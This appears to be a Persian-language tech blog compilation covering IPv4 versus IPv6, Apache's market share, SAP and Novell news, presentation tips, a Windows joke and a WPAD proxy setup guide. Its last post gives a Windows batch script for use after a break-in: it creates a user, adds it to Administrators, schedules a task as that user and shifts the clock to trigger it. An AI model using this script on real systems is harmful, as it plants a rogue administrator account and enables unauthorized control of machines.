تفاوت های IPv4 و IPv6

با اینکه علاقه ای به استفاده از سرویس دهنده های مبتنی بر ویندوز در خدمات  Secure2S ندارم، اما مجبور شدم در مورد  Windows Server 2008 کمی کسب اطلاع کنم.۳ کتاب دست اول رو به عنوان شروع از مایکروسافت پرس انتخاب کردم، با  Windows Server 2008 Networking and Network Access Protection شروع کردم فعلا!
خوب شروع شده است و این هم برگزیده فصل اول: تفاوت هایی که در مورد  
IPv4 و IPv6 باید به خاطر بسپارید:

IPv4   IPv6
IP addresses are 32 bits.   IP addresses are 128 bits.
QoS headers are optional.   QoS support is built in.
IPsec support is optional.   IPsec support is required for all hosts.
Header includes a checksum.   Header does not include a checksum.
Header includes options that always consume space in the header.
Optional fields are stored in header extensions (although IPv6
header size is still twice the IPv4 header  size).
Hosts use Address Resolution Protocol (ARP) to identify each other
on local networks.  
Hosts use
Neighbor Solicitation messages to identify each other on
local networks, which is easier to manage.
Hosts use Internet Group Management Protocol (IGMP) to manage local
subnet group memberships for multicasting.  
Hosts use Multicast Listener Discovery (MLD) to manage
multicast group memberships.
Most hosts receive IP addresses from a DHCP server (although some
hosts can use Internet Control Message Protocol, or ICMP, router
discovery, it’s uncommon).  
Most hosts use ICMP Router Solicitation and Router
Advertisements to determine their IP address, with an optional
DHCPv6
server query for additional configuration settings.
Hosts use broadcast messages to communicate with all hosts on the
local network.  
Hosts use link-local scope all-nodes multicast instead of
broadcast messages.
IPv4 uses interface ID (A) resource records in DNS queries.
IPv6 uses
IPv6 interface ID (AAAA)
resource records in DNS
queries.
IPv4 has a maximum packet size of 65,535 bytes.
An IPv6 Jumbogram can be 4,294,967,295 bytes.

رشد دوباره استفاده از آپاچی

بعد از چندین ماه سقوط سهم وب سرور آپاچی و رسیدن میزان استفاده از این وب سرور به کمتر از ۵۰% در ماه نوامبر با افزایش ۳درصدی میزان استفاده از وب سرور آپاچی بار دیگر سهم استفاده به بیشتر از ۵۰درصد رسید. رشد استفاده از وب سرور Microsoft IIS که از فوریه ۲۰۰۶ شروع شده بود در مدت زمان نسبتا کوتاهی (نسبت به عمر این وب سرور ها) به سرعت در حال پیشروی بود که از مهمترین دلایل این رشد تفاهمات تجاری میان مایکروسافت و برخی سرویس دهنده های اصلی و ارایه دهندگان سرویس های شخصی (MySpace و Live Spaces) بود. آمار دقیق تر را در گزارش این ماه نتکرفت بخوانید:


November 2007 Web Server Survey

همکاری SAP و ناول


SAP AG and
Novell announced on May 15 that they have extended their relationship to offer a new joint support solution for customers who run SAP applications on SUSE Linux Enterprise Server.

These customers now have a single support entry point for the entire software stack — from the operating system through the application — to streamline resolution of support incidents, reduce complexity and lower the total cost of ownership.
MORE

خبر جالبی است،
تصمیم
ناول
و


SAP
برای ارایه محصولات در یک بستر مشترک. البته بلافاصله بعد
از این تصمیم،
SAP و مایکروسافت هم

تفاهمی برای استفاده بهتر از SQL Server 2005
اعلام کردند.

Q: Does your company
run its core business logic on SAP?
 

If the answer is yes,
then your company is (check all that apply):
[ ] Stuck in the 90’s
[ ] Wondering why its IT staff is so large
[ ] Circling the drain
[ ] all of the above

چگونه اسلاید خوب بسازیم

استفاده از اسلاید ها برای نمایش، بیان مفاهیم و برگزاری انواع جلسات با توجه به افزایش حواس درگیر مخاطبان بسیار قابل اهمیت و توجه بر انگیز است.استفاده از IMPRESS و یا PowerPoint در هر صورت نیاز به رعایت نکاتی دارد تا قابل استفاده باشد. نوشته How to Do a Good PowerPoint Lecture قسمتی از این نکات را بیان می کند، فهرست این موارد عبارتند از:

  • شناخت مخاطبان و شنوندگان

  • محدود کردن محتوا با توجه به زمان و عمق جلسه

  • عدم استفاده از فرمول ها و محاسبات جبری

  • – توجه به میزان استفاده از متن خام

  • – ذکر توضیحات برای تصاویر و نمودار ها

  • – توضیح علایم، اختصارات و کلمات خاصی که استفاده می شوند

  • – استفاده از پس زمینه ساده

  • – ساده نگاه داشتن افکت های نمایشی

  • – حداقل استفاده از فیلم و صدا

  • – پرهیز از اسلایدهای بدون مطلب و خالی

  • – استفاده از مسیر منطقی و ساخت یافته برای ساخت اسلاید ها

  • – برای استفاده از آمار ها و اعداد سعی کنید از آخرین نتایج استفاده کنید.

  • – از ذکر کردن منبع اطلاعات نهراسید، حتی اگر منبع رقیب شماست.

  • – اگر اسلاید های شما قابل نشر است، نسخه ای جهت در اختیار قراردادن آن به مخاطبان به همراه داشته باشید.

  • – همواره یک نسخه PDF از اسلاید را برای مشکلات پیش بینی نشده ( عدم امکان استفاده از نرم افزار نمایش دهنده و یا لزوم چاپ دقیق ) به همراه داشته باشید.

Is Windows a Virus

No, Windows is not a virus. Here’s what viruses do:
۱٫They replicate quickly – okay, Windows does that
۲٫Viruses use up valuable system resources, slowing down the system as they do
so – okay, Windows does that.
۳٫Viruses will, from time to time, trash your hard disk – okay, Windows does
that too.
۴٫Viruses are usually carried, unknown to the user, along with valuable programs
and systems. – Sigh.. Windows does that, too.
۵٫Viruses will occasionally make the user suspect their system is too slow (see
۲) and the user will buy new hardware. – Yup, Windows does that, too.
Until now it seems Windows is a virus but there are fundamental differences:
Viruses are well supported by their authors, are running on most systems, their
program code is fast, compact and efficient and they tend to become more
sophisticated as they mature.
So Windows is not a virus.
It’s a bug.

wpad – کشف خودکار وب پروکسی

پيشتر هم اشاره كرده
بودم كه دو نوع
sysAdmin وجود دارد. احمق و غير احمق. البته
لازم نيست شخصيت
sysAdmin غير احمق هميشه كارهاي خوبي انجام
دهد !!! اما يكي از كار هاي جالبي كه اين نوع مي تواند انجام دهد به حداقل رساندن
پروسه هاي اضافي براي استفاده از امكانات موجود است. استفاده از يك دايركتوري سرويس
مناسب ( و مهم تر از آن مديريت مناسب آن ) مي تواند اولين انتخاب و مناسب ترين راه
براي توسعه امن تر شبكه باشد. ولي در اين نوشته قصد ندارم به اين مورد بيشتر اشاره
كنم ! (
Understanding and Deploying LDAP Directory Services, Second Edition كتاب
۹۳۶ صفحه اي نمونه خوب ولي مفصلي در اين مورد است. )

 در اين نوشته كمي در مورد Web Proxy Auto-Discovery Protocol يا به اختصار
wpad
صحبت مي كنم. ابتدا كمي توضيح در مورد اين مفهوم كاملا ساده و پر استفاده. استفاده
از پروكسي در شبكه هاي محلي تقريبا اجتناب ناپذير است و البته منطقي. علاوه بر صرفه
جويي عمده سازمان استفاده كننده در پهناي باند، امكان اعمال كنترل هاي مختلف (
فيلتر نام سايت / محتوا / نوع داده ) و همچنين تاييد هويت كاربران نيز -به وسيله يك
سيستم پروكسي خوب- امكان فراهم مي شود. استفاده از پروكسي همان طور كه مي دانيد
نياز به يك تغيير كوچك در تنظيمات پيش فرض سيستم شما دارد، و اين بهانه اي خوب براي
يك سازمان بزرگ است تا سيستم شما با مرور زمان شامل هرج و مرج شود. ( عدم آشنايي
كاربران و توانايي آنان ، حالت هاي خاص پيش بيني نشده ، و از همه بدتر خرابي ها ).


 
wpad آسان ترين راهي است تا شما بتوانيد بدون اين كه براي
كاربران تغييري اعمال كنيد تنظيمات پروكسي را براي آنان اعمال كنيد. هدف نهايي از
استفاده
wpad اين است تا وب كلاينت ها بدون تنظيمات انساني
و به صورت خودكار تنظيمات مربوط را از منابع شبكه دريافت و اعمال كنند.
براي استفاده از
wpad و پياده سازي با محصولات بازمتن اين
موارد را پيش نهاد مي كنم.
– براي پروكسي احتمالا به جز
Squid به
مورد ديگري فكر نمي كنيد.
– سرويس دهنده وبي بهتر از
Apache هم
براي انتشار
wpad پيدا نخواهيد كرد.
Bind به شرطي كه براي
امنيت آن كمي دقت
كرده باشيد بسيار مناسب است.
– اگر از
DHCP استفاده نكنيد كار خودتون
را زياد كرده ايد. پس اگر هنوز به مرحله اجرا نرسيده ايد سرويس
DHCP
را هم اضافه كنيد.

و براي اجرا:

   
– در DNS سرور خود يك ركورد با آدرسي
مثل
wpad.local.domain اضافه كنيد و local.domain
را با مقدار مناسب جايگزين كنيد.

   

wpad.local.domain را به سمت وب سروري
كه آماده داريد هدايت كنيد.

   
– در ريشه وب سرور ( و يا اگر تنظيمات ديگري داريد .) يك فايل
به اسم
wpad.dat با ساختاري مشابه زير پياده كنيد :

function FindProxyForURL(url, host)
{
if (isPlainHostName(host))
return "DIRECT";
if (isInNet(host, "172.16.20.5", "255.255.0.0"))
return "DIRECT";
if (isInNet(host, "127.0.0.1", "255.255.255.255"))
return "DIRECT";
return "PROXY proxy.local.domain:portno";

}

اگر به اين نتيجه
رسيديد كه اين روش مي تواند براي شما مفيد باشد حتما قبل از استفاده مطالب زير را
بخوانيد :


RFC 3040 – Internet Web
Replication and Caching Taxonomy


Web Proxy
Auto-Discovery Protocol



Automatic Discovery for Firewall and Web Proxy Clients

WPAD

privilege-scalation and Windows

سلام یه چند وقتیه که دیگه جلالم حوصله نوشتن نداره نمیدونم چرا درشو گل نمی گیریم!

چند وقت پیش یکی از دوستانم از من پرسید که چطور می تونه سطح دسترسی خودش رو تحت ویندوز افزایش بده و ایا چیزی شبیه su در ویندوز وجود داره یا نه. پاسخ من هم این بود که نه دقیقا. در واقع یه زمانی بود ولی حذف شد ولی شما می تونی با دستور RUNAS با دادن User و Password هر برنامه ای رو تحت امتیاز کابر خاصی مثلا Admin اجرا کنی.

دوست مورد بحث خوشحال رفت و ناراحت برگشت! گفت که این Runas منتظر Password نمیشه. بلافاصله یادم افتاد که توی Shell هایی که بوسیله Exploit های مختلف بوجود میان امکان استفاده از Runas وجود نداره چون برای پنهان کردن کاراکتر ها وارد یه حالت خاص میشه که این Shell ها قاط میزنن مساله وقتی هیجان برانگیز شد که سر نوشتن یه Batch فایل شرط بستیم با این شرایط که فقط از فایل های موجود در ویندوز استفاده بشه (نه یه برنامه جداگانه که قبلا انتقال داده شده) و 100% خودکار یه Exe خاص رو بتونه تحت امتیاز Admin اجرا کنه.

در راه اکتشافات برای جلوگیری از واژه غلط کردم و پس از کلی کلنجار مشخص شد هیچ راهی برای اجرای Runas در Shell های remote یا Telnet وجود نداره (ظاهرا این مشکل عمدا توسط مایکروسافت بوجود اومده). در واقع هر برنامه ای که نیاز به Password داره و از فانکشنی خاص (که اسمش الان یادم نیست)استفاده می کنه همین مشکل رو داره. پس جواب نهایی این بود که به دستوری نیازه که اینقدر احمق باشه که Password رو جزء پارامترهاش بگیره.

اما به طور مختصر جریان از این قراره که Schtasks دستور کنسولیه که برای زمان بندی کارها طراحی شده به این صورت که شما تعیین می کنید چه برنامه این در چه روز و ساعتی خودکار اجرا بشه که به درد Scan کردن خودکار ویروسها و یه همچین کارایی می خوره یه رابط گرفیکی هم داره که در Start>Control Panel > Scheduled Tasks قرار داره.

در ادامه Script نهایی رو اینجا میارم که امیدوارم به درد بخوره (در واقع فقط به درد افزایش دسترسی بعد از Exploit کردن می خوره) لازه به ذکره که این فقط به درد Scalation از System به Admin می خوره !

۱)NET USER DommyUserName /ADD
۲)NET USER DommyUserName dommypass
۳)NET LOCALGROUP Administrators DommyUserName /Add
۴)schtasks /create /tn dommytaskname  /sc daily /st 23:55:00 /ru
DommyUserName /rp dommypass /tr "Calc.exe"
۵)time 11:55:00
۶)ping 127.0.0.1 >> null
۷)time 23:55:00

توضیح:

  خط اول یه کابر به عنوان DommyUserName  میسازه – خط دوم پسورد این user رو  dommypass قرار میده – در خط سه این کابر به گروه Administator ها اضافه می شه تا دسترسی Admin داشته باشه – در خط بعد یک task برای ساعت 23:55 هر روز تخت کابر فوق بوجود میاد – خط 5 ساعت فعلی سیستم رو به یه ساعت خاص تغییر میده – از خط 6 برای بوجود آوردن 3 ثانیه وقفه استفاده شده – خط هفت ساعت سیستم رو برابر 23:55 دقیقه قرار می ده و Boom!

گاهی لازمه خطوط ۵ و ۶ و۷ چند بار تکرار بشن!